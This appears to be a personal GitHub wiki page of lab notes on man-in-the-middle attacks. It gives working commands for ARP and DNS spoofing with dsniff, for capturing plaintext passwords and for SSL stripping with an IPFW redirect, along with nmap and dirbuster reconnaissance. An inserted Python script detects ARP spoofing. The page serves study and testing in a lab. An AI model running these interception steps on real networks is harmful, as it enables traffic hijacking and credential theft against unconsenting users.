Packet Sniffing and Recon - jonatello/lab-musing GitHub Wiki

Packet sniffing tools and MiTM techniques

Dsniff

Dsniff comes with a set of tools that can be used to poison ARP tables, spoof DNS, and many other things. In this example we will impersonate the victim's gateway with our own interface, so that all of the victim's traffic is proxied through us.

Install the package

pkg install dsniff

Enable kernel IP forwarding

sysctl -w net.inet.ip.forwarding=1

Run arpspoof on the attacker with the victim (10.1.1.99) and gateway (10.1.1.1) specified. This should update the ARP entry for the gateway on the victim (verify via "arp -a").

arpspoof -t 10.1.1.99 10.1.1.1

You can suspend this task and resume it in the background with CTRL+Z followed by "bg %1". It will still spam the console, so it is best to open a new console for the rest.

Run dnsspoof on the attacker to begin spoofing and impersonating hostnames (not specifying any hostnames fakes ALL of them). It's a good idea to be specific about the sites to impersonate and to have a webserver up and ready to take the requests; otherwise it will be quite obvious to the victim that something strange is going on.

dnsspoof

Again, you can suspend this task and resume it in the background with CTRL+Z followed by "bg %2" (job #2). Get your list of jobs via the "jobs" command.

Run dsniff to begin sniffing for plaintext passwords; they will be saved to ~/dsniff.log.

dsniff -w dsniff.log

When done, bring the previous jobs to the foreground with "fg" and end them with CTRL+C. Don't forget to disable kernel IP forwarding.

sysctl -w net.inet.ip.forwarding=0
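The wiki verifies the attack by checking "arp -a" on the victim. The same check works as a detection: the script below is an added example (not part of this wiki) that parses two constructed FreeBSD "arp -a" snapshots and flags the gateway's MAC changing, or one MAC answering for several IPs, which is what arpspoof produces. The host names, IPs and MAC addresses are made up.

```python
import re

# Constructed "arp -a" snapshots from a victim (FreeBSD format). In AFTER the
# gateway's MAC has switched to the one used by 10.1.1.50, as arpspoof causes.
BEFORE = """\
gw.lab (10.1.1.1) at 00:11:22:33:44:01 on em0 expires in 1196 seconds [ethernet]
other.lab (10.1.1.50) at 00:11:22:33:44:50 on em0 expires in 1150 seconds [ethernet]
? (10.1.1.7) at (incomplete) on em0 expired [ethernet]
"""
AFTER = """\
gw.lab (10.1.1.1) at 00:11:22:33:44:50 on em0 expires in 1199 seconds [ethernet]
other.lab (10.1.1.50) at 00:11:22:33:44:50 on em0 expires in 1150 seconds [ethernet]
"""

ARP_LINE = re.compile(
    r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>[0-9a-fA-F:]{17}|\(incomplete\))"
)


def parse_arp(text):
    """Return {ip: mac} from 'arp -a' output; incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m and m.group("mac") != "(incomplete)":
            table[m.group("ip")] = m.group("mac").lower()
    return table


def arp_alerts(before, after, gateway):
    """Compare two snapshots and return a list of alert strings."""
    old, new = parse_arp(before), parse_arp(after)
    alerts = []
    # 1. The gateway's MAC changed between snapshots: the classic sign of
    #    gateway ARP spoofing (a real gateway rarely changes its NIC).
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        alerts.append(f"gateway {gateway} MAC changed {old[gateway]} -> {new[gateway]}")
    # 2. One MAC now claims several IPs, e.g. the gateway plus the spoofing host.
    by_mac = {}
    for ip, mac in new.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for multiple IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in arp_alerts(BEFORE, AFTER, "10.1.1.1"):
        print("ALERT:", alert)
```

Running it periodically against live "arp -a" output gives a cheap host-side check; a static ARP entry for the gateway (arp -s on FreeBSD) stops the cache from being overwritten in the first place.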

SSLSTRIP

https://moxie.org/software/sslstrip/

Install the Package

pkg install py27-sslstrip

Assuming IPFW is already configured and running, create a new rule to forward inbound traffic on port 80 to 8080.

ipfw add 00101 fwd 127.0.0.1,8080 tcp from any to any 80 in

Run sslstrip listening on port 8080; it will log to ~/sslstrip.log.

sslstrip -l 8080

At this point traffic needs to be directed to our attacker via ARP or DNS (use dsniff).

Nmap

Install the package

pkg install nmap

There are many commands and options you can run Nmap with; to get a list, run nmap with no flags.

nmap

A useful command to probe open ports and determine service/version info against a single host or a subnet (CIDR notation can be used) is the -sV flag, along with the -oN flag for normal (plain text) output.

nmap -sV example.com -oN results.txt

Dirbuster

Install the package

pkg install dirbuster

Run dirbuster in headless mode (-H) against the supplied URL (-u) using one of the built-in wordlists (-l).

dirbuster -H -u https://example.com -l /usr/local/share/java/dirbuster/directory-list-1.0.txt

Unfortunately, headless mode appears to throw a java.lang.NullPointerException and does not work. Launching dirbuster with the GUI does seem to work normally.